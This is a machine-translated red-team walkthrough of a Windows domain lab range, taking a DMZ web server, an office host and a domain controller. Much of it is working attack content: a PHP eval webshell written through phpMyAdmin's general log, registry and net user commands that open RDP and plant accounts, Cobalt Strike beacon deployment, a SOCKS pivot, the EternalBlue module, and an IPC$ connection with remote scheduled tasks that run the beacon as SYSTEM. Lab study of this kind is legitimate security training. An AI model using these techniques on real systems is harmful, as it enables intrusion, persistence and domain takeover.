Table of contents
1. Red team shooting range intranet penetration
2. Network topology diagram of this experiment
3. Intranet penetration attack process
1. Win7 penetration in DMZ area
1.3 The principle of remote web site
2. Penetration of the intranet office area (host in the domain)
3. Domain environment penetration (domain control)
3.1 The concept of domain environment
3.4 Going online through CS without going online
3.5 Establish an IPC inter-process communication connection
1. Red team shooting range intranet penetration
1. Target drone tool download
Link: https://pan.baidu.com/s/1LgWAHK3XP2Q9CG6QVdxuw
Extraction code: kiss
Win7 virtual machine login password: hongrisec@2019
2. Network topology diagram of this experiment
In order to achieve intranet penetration in this experiment, we cannot directly infiltrate the intranet server and intranet office area, because the network is not connected.
We can infiltrate through the computers in the DMZ area. The computers in the DMZ area will have a certain connection with the intranet office area. We can use the computers in the DMZ area as a springboard to connect to the intranet office area using tunneling technology (DNS ICMP SOCKS HTTP SSH) , and the office area has a certain connection with the server area, so that we can then break into the intranet.
One computer win7 in DMZ area
A computer win2003 in the intranet office area
Intranet server a computer win2008
We need attack aircraft kali namp ant sword and other tools
3. Intranet penetration attack process
Information collection: ip domain name subdomain name directory CDN whois language framework mailbox architecture structure
Exploitation of Vulnerabilities: Common: SQL XSS XXE CSRF rce upload Middleware: spring struts fastjon historical vulnerabilities. . .
Privilege escalation: Privilege escalation to root administrator privileges
Authority maintenance: A backdoor is installed on the target, the purpose is to ensure that the authority will not be lost, and the target has been controlled.
Intranet proxy: Build a proxy or tunnel to detect and access machines in the intranet.
Intranet collection: local machine information collection, intra-domain information collection, login credential theft, surviving host detection, intranet port scanning.
Intranet vulnerability: use tools (MSF Nessus nmap) to obtain relevant vulnerability information of the host
Lateral movement: The attacker gains access to the internal network, expands the authority through scanning, blasting, smb transfer and other technologies, and moves in the compromised network environment.
Cross-domain attack: conventional penetration method (using web vulnerabilities to obtain permissions across domains) using known domain hash values to conduct hash pass attacks or ticket attacks
Trace Cleanup: Clear system logs, bypass logs, and clear operation traces.
2. Environment construction
1. Win7 in DMZ area
win7 virtual machine
This virtual machine acts as a web server and requires dual network cards, which are 192.168.52.143 and 192.168.111.128 respectively
Vm3 192.168.52.0 acts as the intranet network segment
Vm4 192.168.111.0 serves as the public network segment
Open the win7 virtual machine, set it, add a network card, adjust it to custom, VMnet3 and VMnet4.
Start the win7 virtual machine, turn on the network adaptation, local connection: the first network card
Local Area Connection 4: Second NIC
Open the phpstudy environment
2. Intranet office area
win2k3, configure network vm3, ip is set to 192.168.52.141
Win7 ping win2k3 can ping pass to prove that the environment is no problem
The attack machine kali needs dual network card vm4 as the public network (192.168.111.xxx)
Because this configuration kali can access win7 in the DMZ, and then win7 has a certain connection with the intranet, which can be further infiltrated.
Kali pings win7 192.168.111.128 to prove that the environment configuration is successful
3. Domain control host
win 2008 network card VM3 (192.168.52.xxx)
IP is configured as 192.168.52.138
win7 ping win2008
Win7 login with domain user GOD
ping god.org
net user /domain
If you use the stu1 user, you cannot find the domain user net user /domain, you need to check it under the god user
3. Start the attack
1. Win7 penetration in DMZ area
Purpose: Control this computer through remote desktop.
1.1 Information Collection:
1.ip port directory website development language whois email mobile phone company structure subdomain. . .
Know the ip address:
1. Scan port (namp)
Sweep out some ports
Visit port 80
The phpStudy probe has made some changes on the basis of the original phpinfo. In the development process, we often need various configurations of the server, and "probes" are used to detect configurations.
Discover web services (dirsearch Imperial Sword...)
1. Scan directory
2. Scan background
We visit beifen.rar to download the file.
phpinfo.php page
phpmyadmin page
Use the phpmyadmin blasting tool to copy the website to the txt file first.
Import the txt file just now and start blasting:
Username and password are both root, enter the page
1.2 Information Collected
1. It is found that port 80 is a probe, and it seems that there is no way to use it.
2. Found that the web system has a beifen.rar file
3. Found that the web system has a phpinfo page
4. Found that the web system has a phpmyadmin page (database management interface)
1.3 The principle of remote web site
1. It is necessary to write a Trojan horse into the file of the server ( a sentence of a big horse and a small horse, a Trojan horse, a memory horse, a horse free from killing a horse, etc.. )
2.<?php eval($_POST[1]); ?>
3. How to write it? SQL injection file upload framework vulnerability. . . . It was written through a loophole.
Phpmyadmin getshell tricks
- Found that the password of phpmyadmin is root/root
phpMyAdmin 写 shell
general_log is turned off by default. Turn it on to record every command entered by the user and save it in the corresponding log file. You can try to customize the log file and write content to the log file, then you can successfully getshell:
# View the current configuration
SHOW VARIABLES LIKE 'general%';
Execute the statement in SQL:
The log is saved in the C:\phpStudy\MySQL\data\stu1.log directory
# Change log file location
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/l.php';
Our path is the path of the phpstudy probe, so the log is written to the probe path, and we can upload the Trojan horse to attack
View the configuration next time
# Write payload to the log
select '<?php eval($_POST[1]); ?>';
Take a look at the probe page and find at the bottom:
Ant sword connection:
Enter ip, the connection password is a Trojan horse we wrote 1
Open a virtual terminal, enter whoami to view user ipconfig view ip
We want to log in to the desktop remotely, so make sure that port 3389 is open, the command is as follows:
- open 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user view users
Remote connection 192.168.111.128 found that a password is required
We have two methods: 1. Change user password 2. Add a new user
net user administrator admin@123 #更改密码
net user administrator /active:yes #激活密码
net user username password /add #新建用户
found to be connected all the time,
This page appears,
click yes
It is found that there is remote connection verification on the win7 virtual machine
We shut down and restart the computer on Ant Sword:
shutdown -r -t 0
Remote connection at power on Successful connection! ! !
Summarize:
The first target drone was taken down, and here we used information collection and vulnerability exploitation.
Information collection: The open port was scanned through the ip, and we found the phpstudy probe on the phpmyadmin page through the port.
Vulnerability exploitation: Use getshell to write a one-sentence Trojan horse on the phpmyadmin page, connect with Ant Sword, create a user or change the password for remote desktop connection, and take down the computer in the DMZ area.
2. Penetration of the intranet office area (host in the domain)
We want to enter the intranet, if we enter directly, it will not work, the network is not in the same segment, so we need to use win7 as a springboard to enter the domain host win2003
It is definitely impossible to ping win2003 from this machine
Ant sword win7 ping through win2k3 proves that the configuration is ok
After getting the webshell, usually the machine will go online to cs and msf (post-infiltration)
MSF is the command line CS is the graphical interface of MSF
MSF CS (because these two tools integrate one-click privilege escalation to open proxy to do tunnel scanning, etc.)
Add a network card vm4 (192.168.111.130) to kali
Kali ping win7 (192.168.111.128) proves that the environment is ok
2.1 Go online to CS
1. Run the server bash teamserver kali ip (192.168.111.130) password (123456) in kali
2. Run the client bash cobaltstrike.sh
ip is kali's ip post is the port 9081 of the server just running, the password is 123456
3. Produce a listener
add add a name to any port and write an uncommon one.
The Trojan connects to the listener, and the listener returns to the server, and the content of the server is on this page.
4. Generate a Trojan
Connect to listener kiss
Save it to the desktop, give it a name
5. Upload MSB.exe to win7 with Ant Sword
dir view MSB.exe run
Go back to kali and go online successfully
Session's sleep is changed to 1, and the response is 1 second
enter the command line
View command shell whoami ipconfig
View routing shell route print
View arp, intranet address ip find target ip
ping192.168.52.141 (win2k3) must be pinged
2.2 MSF listening port
CS adds a monitor msf
Spawn sent to msf
It was found that the meterpreter attack was successful! ! ! In this way, msf also penetrated into win7
2.3 Build a socks tunnel
Right click Rivoting Socks server
set port 34456 (port)
Tunnel opened successfully
View tunnel information
Click Tunnel to generate code
copy code link
setg Proxies socks4:192.168.111.130:34456
Backgroud returns in msf
Set the msf tunnel to 192.168.111.130 port is 34456
Now our msf can play intranet
Check win2k3 for Eternal Blue vulnerability
Serial number 3 corresponds to checking whether there is an Eternal Blue vulnerability
use 3 #使用序号3
show options #查看配置内容
set rhosts 192.168.52.141 #设置目标地址
run #运行
Found that there is an eternal blue vulnerability in win 2003
We use 0 ms17_eternablue to find that the system may be too old if it cannot run
But we can take advantage of use 2 cmd
View whoami
View ip address ipconfig
Summarize:
1. Go online to the CS and MSF of the host of the domain controller
2. Build socks proxy
3. Through the MSF connection agent to control the host of the intranet 2003
3. Domain environment penetration (domain control)
3.1 The concept of domain environment
win7 computer name and workgroup domain
I use corporate school to introduce understanding workgroups and domains
Workgroup: Group computers into groups for easy management by administrators.
For example, a company has 100 people (100 computers). The company has several departments, such as HR Department, Operation and Maintenance Department, Finance Department, IT Department, etc.
What are the disadvantages of this? ? ?
There is no discipline and no unified management mechanism.
For example, little K works in the IT department, and my favorite young lady is in the personnel department. Tomorrow, little K will go directly to work in the personnel department.
The manager asked all employees to replace their computers with corporate culture wallpapers so that they could not have software A, but Xiao K didn't listen to it, but instead of changing the wallpaper, he downloaded software A.
In this way the domain concept emerges
Join the network administrator in the domain (similar to the student class teacher): the role of unified management (domain controller)
Intra-domain machine: like employees (students)
On a computer, the network administrator lets employees use whatever wallpaper they want, lets them use whatever software they have, lets them shut down whenever they want, and sets passwords for unified management, etc.
Grade 1 Class 1 (Rocket Class: Domain Name)
Head teacher (leader): domain controller
Students: machines in the domain
Note: A computer can only join one domain. For example, a student can only join one class.
There can be multiple domain controllers in a domain. For example, a class has more than one head teacher and one teacher.
Very important
Local users (indigenous people): local users (accounts and passwords are stored on local machines)
Domain user: It is the user who joins the domain (that is, the account and password are stored on the domain controller). Generally, the enterprise adds the domain to the personal household without adding the domain
Find a domain controller How to see if there is a domain
How to join the domain? ? ?
The DNS of the host computer first selects the ip of the domain server, then fills in the domain name to be joined in the computer properties, enters the account password of the domain server, and finally joins the domain.
A domain server can add a user to set a password to log in to the host computer.
win7DMZ host
God\administrator domain control user
Stu1\administrator local user
3.2 Determine the domain
Shell whoami on kali checks that the user is god. At this time, we don’t know if he is a domain control user. At this moment, we use
shell hostname Check the computer name and return stu1 If it is a local user, it must be stu1\xxx, so I guess god is a domain control user.
Or, the more direct and simple method shell ipconfig/all can clearly see that the host name stu1 dns suffix is god.org
3.3 Intra-domain information collection
Where is the query domain controller?
nslookup -type=SRV _ldap._tcp
View domain controller’s ip 192.168.52.138 (win2008) domain controller’s name owa domain name address god.org
Query how many users there are in the domain
net user /domain
These users are all on the domain controller
Query how many computers are in the domain
net group "domain computers" /domain
stu1 is the computer we control
Query domain controller name
net group "Domain Controllers" /domain
OWA
3.4 Going online through CS without going online
generate a listener
Generate Trojan files
A Trojan horse is generated (a Trojan horse that can go online but not go online)
How is the Trojan horse transmitted to the domain controller? ? ?
View domain controller administrator password
3.5 Establish an IPC inter-process communication connection
The IP and password are domain control win2008
shell net use \\192.168.52.138\ipc$ "GODl123" /user:god\administrator
shell net use #查看连接
Now a connection has been established with the domain controller, which proves that they trust each other and can transfer files.
check it out
Copy the file to the domain controller computer
copy beacon.exe \\192.168.52.138\c$
win2008 domain control host
Create a remote scheduled task
schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f
run
schtasks /run /s 192.168.52.138 /i /tn "test"
connect
connect(link)目标ip 192.168.52.138
View domain controller whoami ipconfig
Check the password (because my domain controller win2008 and springboard win7 set the same password)
Command to view logonpasswords
Downgrade system to administrator
shell schtasks /create /s 192.168.52.138 /tn test1 /sc onstart /tr c:\beacon.exe /ru administrator /f #创建 目标ip 文件名test 木马beacon.exe 用户administrator
shell schtasks /run /s 192.168.52.138 /i /tn "test1" #运行
connect(link) 192.168.52.138
3.6 Lateral movement
In fact, cs integrates one-click connection
One-click connection to the domain controller in the domain
.138 is domain controller
In this way, go directly to the domain controller
The domain controller host controls the hosts in the domain
We want to go online win2k3 192.168.52.141
On-line win2003 success
Summarize:
1. Identify domain users and local users, and collect information in the domain.
2. Use CS to go online without going online, produce Trojan horses, check domain passwords, and establish IPC communication connections.
3. Horizontal movement, mutual penetration between the domain controller host and the host in the domain.